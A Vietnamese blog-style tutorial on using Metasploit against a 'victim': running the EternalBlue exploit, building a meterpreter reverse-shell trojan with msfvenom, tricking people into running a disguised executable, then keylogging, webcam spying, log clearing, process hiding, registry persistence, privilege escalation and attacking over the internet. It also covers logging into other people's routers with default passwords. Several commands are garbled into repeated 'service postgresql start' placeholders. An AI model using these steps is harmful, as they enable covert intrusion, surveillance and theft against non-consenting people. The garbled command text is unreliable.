Hướng dẫn tải và cài đặt metasploit trên kali linux ✅ Mới nhất
Kinh Nghiệm Hướng dẫn Hướng dẫn tải và setup metasploit trên kali linux Mới Nhất
Hoàng Phương Linh đang tìm kiếm từ khóa Hướng dẫn tải và setup metasploit trên kali linux được Update vào lúc : 2022-12-21 22:30:20 . Với phương châm chia sẻ Thủ Thuật về trong nội dung bài viết một cách Chi Tiết 2022. Nếu sau khi đọc nội dung bài viết vẫn ko hiểu thì hoàn toàn có thể lại Comments ở cuối bài để Mình lý giải và hướng dẫn lại nha.Metasploit là bộ công cụ hack có sẵn trong những phiên bản linux như Kali linux, Backbox, … , nhằm mục đích tấn công và khai thác những lỗ hổng bảo mật thông tin trên những nền tảng rất khác nhau như windows, linux, website, cisco, … Bạn vẫn hoàn toàn có thể cài Metasploit trên những hđh linux khác (tham khảo link này), có cả phiên bản dành riêng cho Windows.
Có 2 hình thức khi sử dụng Metasploit:
- Sử dụng những module để dò quét và tấn công vào lỗ hổng bảo mật thông tin của đối tượng.Tạo mã độc (trojan), rồi bằng một cách nào đó truyền mã độc vào máy nạn nhân và nạn nhân kích hoạt nó.
Đánh vào lỗ hổng bảo mật thông tin phụ thuộc vào việc máy victim có để hổng lỗ nào hay ko. Nó hoàn toàn có thể là những dịch vụ mạng mà tính bảo mật thông tin kém mà máy victim đang chạy. Dĩ nhiên máy victim mà bế quan toả cảng, ko mở port nào cả thì ta chẳng thể thâm nhập được từ bên phía ngoài.
Cài trojan đòi hỏi phải bằng phương pháp một cách nào đó attacker truyền trojan và thực thi nó trên máy victim. Bạn phải trực tiếp mó tay vào máy nạn nhân, ví dụ “cho tao mượn máy vào mạng tí” hay “đưa máy đây tao cài win cho”; hoặc dụ nạn nhân tải và mở file độc hại ấy, ví dụ như bạn up lên fshare file mang tên “tool-get-link-jav-hd.exe”, nạn nhân tưởng thật tải về rồi nhấn mở chạy, khi đó máy nạn nhân chính thức bị hack (để kế hoạch hoàn hảo nhất hơn, tool ấy getlink được thật, nhưng đồng thời nó ngấm ngầm chạy mã độc).
Ngồi dò quét lỗ hổng tính khả thi thấp, bởi hầu hết những lỗ hổng định nghĩa trong Metasploit giờ đây đều đã có bản vá lỗi, bạn phải trông chờ vào việc update những module mới ra lò của Metasploit hoặc lấy từ nguồn bên phía ngoài mà trong thời gian hiện tại chưa tồn tại ai vá, hoặc xác suất nhỏ rằng máy nạn nhân “rỗ” tùm lum, ko update bản vá hay phần mềm đã lỗi thời. Cài trojan thì tính dữ thế chủ động cao hơn, nhưng cũng rất dễ khiến bạn bị lộ mặt nếu nạn nhân ngoại suy ra những ai đó đã từng động vào máy của tớ. Hay nói cách khác, tính khả thi của phương pháp này phụ thuộc vào nạn nhân có nghi ngờ hay ko. Phương pháp thứ nhất thì đảm bảo bảo vệ an toàn và đáng tin cậy cho những người dân tấn công hơn, vì nạn nhân ko hề hay biết (gọi là bảo vệ an toàn và đáng tin cậy khi victim là người tiêu dùng phổ thông thôi, chứ bạn tấn công theo phương pháp nào thì cũng để lại dấu vết, phải đánh lạc hướng người truy dấu bằng phương pháp hàng fake địa chỉ MAC hay ẩn danh qua mạng Tor hoặc VPN. Cách để bảo vệ bản thân khỏi sự truy dấu, mình sẽ đề cập sau).
Ok tạm hiểu phương pháp hoạt động và sinh hoạt giải trí của 2 phương pháp trên như vậy đã. Bây giờ ta sẽ đi vào rõ ràng tiến hành. Mình sẽ phân nội dung bài viết làm 2 phần tương ứng với 2 cách tấn công đó.
Tấn công nhờ vào khai thác lỗ hổng bảo mật thông tin:
Khởi động Metasploit bằng lệnh msfconsole . Ở nhiều nội dung bài viết mà mình tham khảo, ngta đề xuất chạy service postgresql start trước (postgresql là một phần mềm quản lý cơ sở tài liệu, vì bộ công cụ của Metasploit tập hợp rất nhiều module nên phải chạy nó để việc tìm kiếm module thuận tiện và đơn giản hơn), mình thấy điều này cũng là thiết yếu.Có một lưu ý là nếu đây là lần đầu tiên bạn chạy Metasploit, bạn nên chạy lệnh msfdb init trước để nó tạo database. Cập nhật của Metasploit thì khỏi lo vì địa chỉ kho update đã được khai báo trong repository của Kali linux (Backbox, Ubuntu), như vậy nó được update cùng với khối mạng lưới hệ thống thông qua lệnh apt-get update và apt-get upgrade; để cho chắc cú, bạn vẫn có lệnh msfupdate.Mỗi một lỗ hổng bảo mật thông tin được định nghĩa trong Metasploit thường có 2 module, một là cái auxiliary để quét xem máy victim có chứa lỗ hổng này ko, hai là exploit để khai thác điều đó.
Mình lấy ví dụ với lỗ hổng bảo mật thông tin smb_ms17_010 nổi tiếng thuở nào sau vụ WannaCry, khi gõ lệnh tìm kiếm search [từ_khoá], bạn sẽ được đường dẫn dẫn tới những module đó. Dùng cái nào thì gõ lệnh use [đường_dẫn_module]. Mình thử với exploit của smb_ms17_010 nhé:
use exploit/windows/smb/ms17_010_eternalblue
Gõ tiếp show info để xem thông tin và những tuỳ chọn của nó.

Hãy để ý quan tâm vào Available targets và Basic options. Lựa chọn nền tảng hệ điều hành của máy victim mà ta nhắm tới. Ở đây module này chỉ nhắm tới win7 và win server 2008, mặc định mã id target là 0. Nếu có nhiều lựa chọn target hơn, hãy set target [mã_id] để chọn nền tảng nhắm vào.
Xem những giá trị ở cột Current Setting, thiếu hay cần thay đổi cái nào thì thông số kỹ thuật cho nó theo cú pháp set [tên_option] [giá_trị]. Như ở hình trên, thiếu giá trị cho RHOST, đó là địa chỉ IP của máy victim, hay ProcessName, tên tiến trình trên máy victim mà ta gài payload vào, thích thì bạn đổi tên khác cũng đc, hay RPORT là port (cổng) mà ta muốn mở trên máy victim, đổi giá trị khác cũng dc, nhưng thôi để mặc định. Lưu ý ở cột Required, giá trị Yes tức là nên phải có.
LHOST, LPORT, RHOST, RPORT là gì?
LHOST: local host, là địa chỉ ip của máy attacker.
LPORT: chọn lấy một cổng để Metasploit lắng nghe tín hiệu gửi về.
RHOST: remote host, là địa chỉ ip của máy victim.
RPORT: tương tự thì con trojan sẽ phát tín hiệu qua cổng này trên máy victim (LPORT và RPORT ko nhất thiết phải giống nhau, nhưng ta để giống nhau cho đỡ phải suy nghĩ nhiều).Xong thì gõ lệnh exploit để khởi đầu tấn công.
(Nếu sau khi gõ exploit mà vài giây sau nó báo ConnectionTimeout nghĩa là bạn đã ko thành công. Có thể máy nạn nhân ko tồn tại lỗ hổng đó, hoặc do bạn đặt những tham số chưa đúng)
Nếu exploit thành công, bạn hoàn toàn có thể can thiệp được vào máy victim với rất nhiều tuỳ chọn. Hai phương pháp đi theo hai con phố rất khác nhau, nhưng một khi thâm nhập vào máy nạn nhân rồi thì hành xử giống nhau thôi, nên mình sẽ trình bày tiếp sau phần hướng dẫn phương pháp 2 dưới đây.
Tấn công nhờ vào cài mã độc vào máy nạn nhân:
Tạm thời mình ra mắt tạo payload bằng msfvenom có sẵn trong bộ Metasploit trước, những framework cũng tạo mã độc khác sẽ tương hỗ update sau.
msfvenom -a x86 --platform windows -f exe -p windows/meterpreter/reverse_tcp lhost=[ip] lport=[cổng] -o [tên_file].exevới những tham số –platform nền tảng windows, -a hạ tầng áp dụng là 32 bit hay 64 bit, -f định dạng file xuất ra là exe, -p dùng loại payload nào, lhost là địa chỉ IP của máy mình, lport là cổng mở trên máy mình, -o là vị trí lưu kèm đặt tên file xuất ra. Ngoài ra còn tồn tại những tham số như -e lựa chọn kiểu mã hoá, -i là số lần mã hoá payload, -s là kích thước file xuất ra (nặng nặng xíu cho victim khỏi nghi ngờ, vì thông thường file payload xuất ra chỉ cỡ vài chục hay vài trăm kB). Để biết rõ ràng hơn những option, gõ msfvenom -h
Bàn chút về địa chỉ IP điền vào LHOST. Nếu bạn và victim chung một mạng LAN, hãy điền vào LHOST địa chỉ private IP, tức là địa chỉ có dạng 192.168.x.x. Kiểm tra private IP máy bạn bằng lệnh ifconfig. Nếu bạn muốn exploit victim qua internet, thì điền vào LHOST địa chỉ public IP. Xem public IP trên một số trong những trang web như canyouseeme.org, whatismyip.com. Tuy nhiên hack ngoài mạng LAN rất trở ngại vất vả mà mình sẽ trình bày ở phần cuối nội dung bài viết.Mở một hiên chạy cửa số terminal khác, chạy msfconsole để khởi chạy Metasploit.Gõ service postgresql start0service postgresql start1 thiết lập kiểu payload mà bạn đã chọn để tạo file payload vừa rồi.
Rồi cũng service postgresql start2, service postgresql start3 cho khớp với những tham số khi tạo trojan ban nãy.Gõ exploit để hóng link về. Khi nạn nhân kích hoạt file payload của bạn và ko gặp trở ngại gì trên đường truyền, bạn sẽ nhận được tin báo “meterpreter session 1 opened”.
Đôi khi bạn phải gõ thêm service postgresql start5 để phiên thao tác meterpreter mở ra (lưu ý tuỳ vào mã số session trên thông báo mà nhập số đó cho option -i cho đúng).
Một số lệnh thông thường tác động vào máy victim một khi meterpreter được mở (thêm tuỳ chọn -h vào sau để biết rõ ràng cú pháp):
- help: xem tất cả những lệnh trong meterpreter kèm theo mô tả ngắn.background: lệnh này đưa session (phiên thao tác) hiện tại về chính sách nền, tức là quay về dấu nhắc “msf >” nhưng vẫn đang hóng link từ victim (khác với lệnh exit là nó thoát hẳn). Quay trở lại phiên thao tác đó (dấu nhắc “meterpreter >”) chỉ việc nhập lệnh sessions -i [mã_phiên]cd, pwd và ls: cũng là những lệnh trỏ thư mục, xem đường dẫn thư mục hiện tại, liệt kê file trong thư mục y hệt như thao tác trên linux, nhưng khác là ta đang thao tác trên máy nạn nhân.lcd và lpwd: ngược lại, 2 lệnh này thao tác trên máy attacker.show_mount: hiển thị thông tin về những ổ đĩa của máy nạn nhân.clearev: xoá những log ghi lại lịch sử hoạt động và sinh hoạt giải trí trên máy nạn nhân.tải về : tải file từ victim về máy mình. Lưu ý dạng đường dẫn là của win.upload : tải file từ máy mình lên victim.edit : xem và sửa đổi file ngay trên dòng lệnh.excute -f [file] : thực thi file nào đó trên máy nạn nhân. Có những tuỳ chọn như: -H (ẩn tiến trình để victim ko nhìn thấy), -h (mở help xem hướng dẫn).ipconfig: xem địa chỉ private IP của máy victim.ps: hiện list những tiến trình đang chạy trên máy victim.search: tìm kiếm file hoặc thư mục trên thư mục nhất định.shell: chạy lệnh cmd trên máy victim.keyscan_start: khởi đầu theo dõi nhập liệu từ bàn phím victim.
keyscan_dump: hiển thị chuỗi ký tự thu được.
keyscan_stop: dừng theo dõi bàn phím.screenshot: chụp màn hình hiển thị máy nạn nhân.webcam_list: xem list những webcam.
webcam_snap: chụp hình từ webcam.
webcam_stream: soi webcam.
Có những tham số như: -h (help), -i mã_số_camera (nếu máy victim có 2 camera trở lên, ví dụ như điện thoại, hãy điền số chỉ đã được nêu trong webcam_list, mặc định là một trong), -q phần_trăm (chất lượng ảnh jpeg xuất ra sau khi chụp), -p đường_dẫn (thay đổi nơi lưu file xuất ra cũng như tên file, mặc định nơi lưu là thư mục /home/tên_người_dùng hoặc /root, tên file thì đặt ngẫu nhiên).
Lưu ý, khi thực hiện lệnh liên quan đến webcam này, đèn báo của webcam trên máy tính sẽ sáng, nên nạn nhân hoàn toàn có thể nghi ngờ. Điện thoại thì ko có đèn báo nên có vẻ như như ko lo bị lộ.migrate mã_pid: khi nạn nhân mở Task manager lên, hiển nhiên sẽ nhìn thấy file exe của bạn đang chạy. Để tránh bị lộ, bạn cần cấy file backdoor của bạn vào một tiến trình đang chạy khác. Khi đó tiến trình gốc mất đi, nhưng link vẫn còn tồn tại nhờ mã đã ký sinh vào tiến trình bị nhiễm kia (lưu ý migrate chỉ giấu đi tiến trình xâm nhập, nếu tiến trình nhiễm bị tắt thì coi như mất link). Để thực hiện được migrate, đòi hỏi bạn phải leo thang đặc quyền, xem phần dưới.run vnc: xem trực tiếp những gì ra mắt trên desktop máy nạn nhân.
Lưu ý là vnc viewer sẽ tạo ra một file exe, đẩy nó vào máy nạn nhân rồi thực thi nó, do đó nạn nhân mở Task manager lên sẽ thấy một file exe với tên lạ hoắc.
Nếu điền thêm tham số -i, thay vì build ra file exe, nó sẽ nhúng vào một chương trình sẵn có trong máy, mặc định là notepad.exe . Nếu có tham số -i đi kèm với tham số -P tên_chương_trình , nó sẽ nhúng vào chương trình đó, ví dụ cmd.exe . Cẩn thận nhé, chương trình đó vẫn hoàn toàn có thể hiện lên trước mắt nạn nhân và bị nạn nhân tắt péng đi, riêng cmd.exe thì chạy ẩn được.
Thiết lập persistence để cài vĩnh viễn và tự động kích hoạt trên máy victim:
Nếu để thông thường, bạn chỉ thâm nhập vào máy nạn nhân khi nạn nhân mở file trojan đó và mất link khi bạn thoát khỏi phiên thao tác meterpreter hoặc nạn nhân tắt máy. Dù bạn có gõ lại lệnh exploit lần nữa hoặc nạn nhân khởi động lại máy, thì bạn ko thể điều khiển lại máy nạn nhân được nữa, trừ phi file mã độc kia được nạn nhân ngu ngơ mở lại lần nữa. Vì thế để payload liên tục gửi tín hiệu và attacker hứng link lúc nào thì cũng đc, bạn cần chạy persistance. Sau khi thâm nhập thành công và hiện dấu nhắc “meterpreter >”, hãy gõ lệnh sau:
service postgresql start6
Khi đó payload sẽ tạo ra file .vbs mặc định được lưu vào trong đường dẫn C:Userstên_người_dùngAppDataLocalTemp và chèn thuộc tính autorun vào registry HKCU(hay HKLM)SoftwareMicrosoftWindowsCurrentVersionRun . Các tham số như: -i (cách bao nhiêu giây thì phát tín hiệu một lần), -A (tự động link với use multi/handler), -L đường_dẫn (nơi lưu file vbs, nếu ko muốn lưu theo đường dẫn mặc định kia), -P (loại payload được dùng, mặc định là windows/meterpreter/reverse_tcp), -S (tự động chạy khi máy khởi động và chạy như một service), -U (tự động chạy với tài khoản người tiêu dùng), -X (tự động chạy với mọi tài khoản), -h (mở help xem hướng dẫn).
Leo thang đặc quyền (Privilege Escalation): khi bạn thâm nhập vào máy victim, mọi hành vi của bạn là đang dùng quyền của tài khoản user đang đăng nhập, nếu thực thi những yêu cầu đòi hỏi phải có quyền administrator, bạn sẽ gặp thông báo “access is denied” và ko thực hiện được. Do đó cần leo thang đặc quyền để thực thi hành vi với quyền quản trị cao nhất.
Tại dấu nhắc “msf >”, gõ lệnh:service postgresql start7service postgresql start8: nhập mã phiên thao tác hiện tại.
service postgresql start9: mặc định giá trị là 0 tuơng ứng với kiến trúc 32bit.search [từ_khoá]0
Để kiểm tra xem bạn thực hiện leo thang đặc quyền thành công hay chưa, trở lại phiên session, ở dấu nhắc meterpreter, gõ lệnh search [từ_khoá]1, nếu nó hiện Server username là Authority/System thì ok, nếu chưa thì chạy lệnh search [từ_khoá]2 , rồi kiểm tra lại bằng getuid .
Những vấn đề gặp phải khi thực hiện tấn công ngoài mạng LAN và cách xử lý và xử lý:
Thứ nhất là bạn nên phải đăng nhập vào được router và thực hiện NAT Port (hay còn gọi Port Forwarding, là được cho phép thiết bị nào trong mạng được tự do trao đổi tài liệu ra bên phía ngoài qua cổng nào, và trả về bằng cổng nào). Mỗi router có cách NAT port rất khác nhau, bạn nên gg search trước. Còn vấn đề làm thế nào đăng nhập vào router? Mở trình duyệt gõ địa chỉ 192.168.1.1 (thường là thế). Nếu router là của bạn mua thì khỏi bàn, nhưng nếu bạn chỉ là người xài ké, hãy kỳ vọng rằng chủ sở hữu chưa đổi pass. Các router thông thường thường có user lẫn pass là “admin”, trừ Dlink pass để trống, DrayTek pass “1234”. Cũng cần lưu tâm đến chuyện bên phía ngoài router của bạn còn router khác nữa, nghĩa là bạn phải NAT port cho tất cả hai router sao cho thông suốt một lối đi.
Điều thứ hai là địa chỉ public IP luôn thay đổi, mỗi lần bạn link vào internet, ISP (Internet Service Provider – nhà đáp ứng dịch vụ internet) lại cấp cho bạn IP mới. Bạn hoàn toàn có thể sử dụng những dịch vụ dynamicDNS miễn phí như noip.com, nó làm 2 việc: đáp ứng một tên miền cố định và thắt chặt, và link tới máy bạn để lấy địa chỉ public IP. Như vậy bạn điền tên miền đó vào LHOST, dịch vụ sẽ phân giải tên miền ra public IP hiện tại của bạn (kiểu như bạn cứ điền chức vụ “lớp trưởng” vào LHOST, còn giáo viên sẽ làm dDNS phân giải “lớp trưởng” là tên gọi đứa nào trong lớp).
Thực tế rất hay gặp trường hợp mạng lồng mạng, rất khó để hoàn toàn có thể thông số kỹ thuật con router ở cấp bên phía ngoài, đã thế thông số kỹ thuật lằng nhằng rồi lại hoá hư vô. May thay, tất cả chúng ta có cách xử lý và xử lý đơn giản và thuận tiện và đơn giản hơn nhiều, đó là sử dụng VPN (Virtual Private Network – mạng riêng ảo). VPN được cho phép bạn thiết lập một link riêng tư (gọi là tunnel – đường hầm) với sever VPN mà ko cần bận tâm ở giữa là gì. Giới thiệu với những bạn trang portmap.io . Chỉ với tài khoản miễn phí, bạn đã hoàn toàn có thể sử dụng dịch vụ VPN ko số lượng giới hạn thời gian, chỉ số lượng giới hạn một quy tắc link.
Tải thêm tài liệu liên quan đến nội dung bài viết Hướng dẫn tải và setup metasploit trên kali linux programming